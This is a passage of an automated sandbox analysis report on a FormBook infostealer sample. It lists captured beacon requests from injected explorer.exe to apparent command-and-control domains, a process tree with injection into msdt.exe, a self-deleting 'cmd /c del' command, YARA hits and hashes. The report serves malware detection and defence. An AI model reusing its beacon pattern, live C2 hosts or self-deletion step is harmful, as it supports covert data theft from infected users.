                                            Data Raw: 33 65 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 74 69 74 6c 65 3e 53 75 65 70 65 72 20 53 6f 6c 64 69 65 72 73 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 31 30 30 2c 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 2c 39 30 30 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 40 6d 64 69 2f 66 6f 6e 74 40 6c 61 74 65 73 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 64 65 73 69 67 6e 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 38 61 63 63 64 31 63 35 2e 63 73 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 74 79 6c 65 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 61 70 70 2e 39 30 39 30 37 31 32 38 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 61 66 38 38 30 39 32 37 2e 6a 73 22 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 61 73 
3d 22 73 63 72 69 70 74 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 38 61 63 63 64 31 63 35 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 72 6f 6e 67 3e 57 65 27 72 65 20 73 6f 72 72 79 20 62 75 74 20 53 75 65 70 65 72 20 53 6f 6c 64 69 65 72 73 20 64 6f 65 73 6e 27 74 20 77 6f 72 6b 20 70 72 6f 70 65 72 6c 79 20 77 69 74 68 6f 75 74 20 4a 61 76 61 53 63 72 69 70 74 20 65 6e 61 62 6c 65 64 2e 20 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 69 74 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2e 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 64 69 76 20 69 64 3d 22 61 70 70 22 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 63 68 75 6e 6b 2d 76 65 6e 64 6f 72 73 2e 61 66 38 38 30 39 32 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 61 70 70 2e 39 30 39 30 37 31 32 38 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: 3ef<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><link rel="icon" href="/favicon.ico"><title>Sueper Soldiers</title><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,700,900"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@mdi/font@latest/css/materialdesignicons.min.css"><link href="/css/chunk-vendors.8accd1c5.css" rel="preload" as="style"><link href="/js/app.90907128.js" rel="preload" as="script"><link href="/js/chunk-vendors.af880927.js" rel="preload" as="script"><link href="/css/chunk-vendors.8accd1c5.css" rel="stylesheet"></head><body><noscript><strong>We're sorry but Sueper Soldiers doesn't work properly without JavaScript enabled. Please enable it to continue.</strong></noscript><div id="app"></div><script src="/js/chunk-vendors.af880927.js"></script><script src="/js/app.90907128.js"></script></body></html>
Nov 25, 2021 15:09:20.482167959 CET | 6790 | IN | Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49794 | 103.224.212.219 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 15:09:30.601727009 CET | 7145 | OUT | GET /sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX HTTP/1.1
                                            Host: www.arsels.info
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:30.842940092 CET | 7146 | IN | HTTP/1.1 302 Found
                                            Date: Thu, 25 Nov 2021 14:09:30 GMT
                                            Server: Apache/2.4.25 (Debian)
                                            Set-Cookie: __tad=1637849370.3647175; expires=Sun, 23-Nov-2031 14:09:30 GMT; Max-Age=315360000
                                            Location: http://ww25.arsels.info/sh5d/?Yv=U9Dn+H6I1oLCGiFi1oW/bg7Rnic0zjRPtt9AMGb5MRiLdOF7LfbhYF1T4mwo8MTrEy0Q&8pZ=MFQX&subid1=20211126-0109-303d-a829-871fbc9656f2
                                            Content-Length: 0
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8


                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                            4          | 192.168.2.3 | 49812       | 34.102.136.180 | 80               | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Nov 25, 2021 15:09:35.941904068 CET | 7185 | OUT | GET /sh5d/?Yv=bH0MuGY0n47F1S4kOvzCBL0/mw6YL+7138CmEb6WqYz18csJYDgpNmReh/JvI3nBbY8S&8pZ=MFQX HTTP/1.1
                                            Host: www.electricatrick.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:09:36.061017036 CET | 7187 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:09:36 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6192576c-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | Process
                                            5          | 192.168.2.3 | 49821       | 34.102.136.180 | 80               | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Nov 25, 2021 15:10:15.342689991 CET | 7206 | OUT | GET /sh5d/?Yv=Pdn0Hokg7Q3B7dDVtUX5QMohVVbqJZ0HrhWfxUy6sRCS+GjM4sZ5xKohcZ81Ep8iPYLe&8pZ=MFQX HTTP/1.1
                                            Host: www.vupeliquid.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Nov 25, 2021 15:10:15.460524082 CET | 7207 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:10:15 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "6192576d-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Memory Usage

                                            High Level Behavior Distribution

                                            Behavior

                                            System Behavior

                                            General

                                            Start time:15:08:07
                                            Start date:25/11/2021
                                            Path:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
                                            Imagebase:0xc10000
                                            File size:446976 bytes
                                            MD5 hash:FCC2D1CDA8D3989FECA9C5F5F900E164
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.292465648.00000000042A7000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:15:08:10
                                            Start date:25/11/2021
                                            Path:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            Imagebase:0xe60000
                                            File size:446976 bytes
                                            MD5 hash:FCC2D1CDA8D3989FECA9C5F5F900E164
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.346581658.0000000001450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.346764994.0000000001880000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.289531768.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.290051864.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:15:08:13
                                            Start date:25/11/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff720ea0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.323615980.000000000F7EA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:15:08:34
                                            Start date:25/11/2021
                                            Path:C:\Windows\SysWOW64\msdt.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\msdt.exe
                                            Imagebase:0x1b0000
                                            File size:1508352 bytes
                                            MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.551703779.0000000000970000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.553715961.0000000002C00000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:15:08:39
                                            Start date:25/11/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe"
                                            Imagebase:0xd80000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:15:08:40
                                            Start date:25/11/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7f20f0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis

                                              Executed Functions

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.291654765.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: 48;i$48;i$d$d
                                              • API String ID: 0-2551773726
                                              • Opcode ID: 0075b6df10485f3007e44663f5c8d6cd5ab432776e36685fdfd15a064a748776
                                              • Instruction ID: b058d8b8d5e9640cd4a52cac8ba72245938d01a1e8e9c2a6b0b8f0d8ad6ac13e
                                              • Opcode Fuzzy Hash: 0075b6df10485f3007e44663f5c8d6cd5ab432776e36685fdfd15a064a748776
                                              • Instruction Fuzzy Hash: 04321B79A0020ACFDB18CF64E494A99B7B6FF89304F1581E5D9099B365DB34ED42CF80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.291654765.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: 48;i$48;i$d
                                              • API String ID: 0-92524218
                                              • Opcode ID: adaded677f60fe67f99707daa8de392eddd60d4ed3eb136f92e8b59be15dff31
                                              • Instruction ID: 63a0d5d70e038238fe691fa14d6ec9351f43fffc55b10e18df3eb2bb5a452682
                                              • Opcode Fuzzy Hash: adaded677f60fe67f99707daa8de392eddd60d4ed3eb136f92e8b59be15dff31
                                              • Instruction Fuzzy Hash: 8BC23E75B00209CFDB19DF64E454AA9BBB6FB89304F1084A9D90A9B3A5DF34ED42CF41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.291654765.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efc83ddbefd2a0cca426ef8ee0e7516744675bf74d1e28939980b8aca8f855f5
                                              • Instruction ID: 01508401197b62d718f1f0e759577ab0bade342870a412f56cc23977a8408cc0
                                              • Opcode Fuzzy Hash: efc83ddbefd2a0cca426ef8ee0e7516744675bf74d1e28939980b8aca8f855f5
                                              • Instruction Fuzzy Hash: 4F222536A00219CFDF25DF78E4946BD7BB6AF84318F0588A9D8169B295DB34FC41CB81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlEncodePointer.NTDLL(00000000), ref: 013D47CD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.291654765.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false
                                              Similarity
                                              • API ID: EncodePointer
                                              • String ID:
                                              • API String ID: 2118026453-0
                                              • Opcode ID: c23056ef8381a054e1cd27e1bd1b04560ae7d8c478c9ea244ea8753e2f492b15
                                              • Instruction ID: be8cbe71a07c6e3e77601bf0d0ce027f4a9424917cc56f4ff23434204e70c497
                                              • Opcode Fuzzy Hash: c23056ef8381a054e1cd27e1bd1b04560ae7d8c478c9ea244ea8753e2f492b15
                                              • Instruction Fuzzy Hash: 60218EB6D103498FDB50DFA8E54539ABFF4FB09318F144829E459E7A41C739A508CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlEncodePointer.NTDLL(00000000), ref: 013D4522
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.291654765.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false
                                              Similarity
                                              • API ID: EncodePointer
                                              • String ID:
                                              • API String ID: 2118026453-0
                                              • Opcode ID: 6273de2372225c5238324692d727ca09061d8b40249454a9f12a40a3fbbf10e8
                                              • Instruction ID: 10a76b79d6356b06084a3078639a9db1511a2d02bdad29839416003898c890e4
                                              • Opcode Fuzzy Hash: 6273de2372225c5238324692d727ca09061d8b40249454a9f12a40a3fbbf10e8
                                              • Instruction Fuzzy Hash: F5214AB2A003488FDF50CFA9D54939EBFF4EB49318F648829D455A3B41D739A544CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlEncodePointer.NTDLL(00000000), ref: 013D4522
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.291654765.00000000013D0000.00000040.00000001.sdmp, Offset: 013D0000, based on PE: false
                                              Similarity
                                              • API ID: EncodePointer
                                              • String ID:
                                              • API String ID: 2118026453-0
                                              • Opcode ID: 3a83240a1098d85a139d27e03e844a8bba65bcbf2e883b0bb74cad90ad3db5da
                                              • Instruction ID: 1647811702fcbb4de83d785d697789f9c2e91f51d3c8e920a28494f6315d53a4
                                              • Opcode Fuzzy Hash: 3a83240a1098d85a139d27e03e844a8bba65bcbf2e883b0bb74cad90ad3db5da
                                              • Instruction Fuzzy Hash: 531167B1A003488FDB20CFA9D54979EBFF4FB49318F208829D419A3B01DB39A544CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.291594403.000000000138D000.00000040.00000001.sdmp, Offset: 0138D000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d628b3bf2d00ae04b0f17f102c393929c9bb05bd47724ea92bd1ccc31af2013f
                                              • Instruction ID: 64ab824ad348403e88a144fbcd7fc1fa5318efd4fc51f650d5b5eca24c5b5f7d
                                              • Opcode Fuzzy Hash: d628b3bf2d00ae04b0f17f102c393929c9bb05bd47724ea92bd1ccc31af2013f
                                              • Instruction Fuzzy Hash: BF2142B0504304DFCB11EFA4D9C0B16BBA9FB84368F24C9A9D80A0B386C736D807CA61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.291594403.000000000138D000.00000040.00000001.sdmp, Offset: 0138D000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: abe3a79b71d5a6ab5434c2c550ac10f7a27ed0520e362bee17f3833a5207920d
                                              • Instruction ID: d35d40d49e30ac16f71bd4f8bc2ad8ad26d3273886924cb6e9ad1fe2db08c938
                                              • Opcode Fuzzy Hash: abe3a79b71d5a6ab5434c2c550ac10f7a27ed0520e362bee17f3833a5207920d
                                              • Instruction Fuzzy Hash: 6F118EB5504380DFDB12DF54D5C4B15BB61FB44318F24C6A9D8494B696C33AD44BCB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.291147325.0000000000C12000.00000002.00020000.sdmp, Offset: 00C10000, based on PE: true
                                              • Associated: 00000000.00000002.291142060.0000000000C10000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.291189120.0000000000C80000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1babb249679bd59e3b6b85639d84e0db218a54b49a9be69aa4bfadd5e4282ca
                                              • Instruction ID: 29866729cc55b1a70c00e1c3077d60597f0af24f559deb2d88816b2cf0b08b6c
                                              • Opcode Fuzzy Hash: f1babb249679bd59e3b6b85639d84e0db218a54b49a9be69aa4bfadd5e4282ca
                                              • Instruction Fuzzy Hash: EDE2226140E3C19FCB138B789CB55E5BFB1AE6721471E49CBC0C1CF0A3E1195A9AE762
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              APIs
                                              • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: 1:A$r=A$r=A
                                              • API String ID: 2738559852-4243674446
                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                              • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
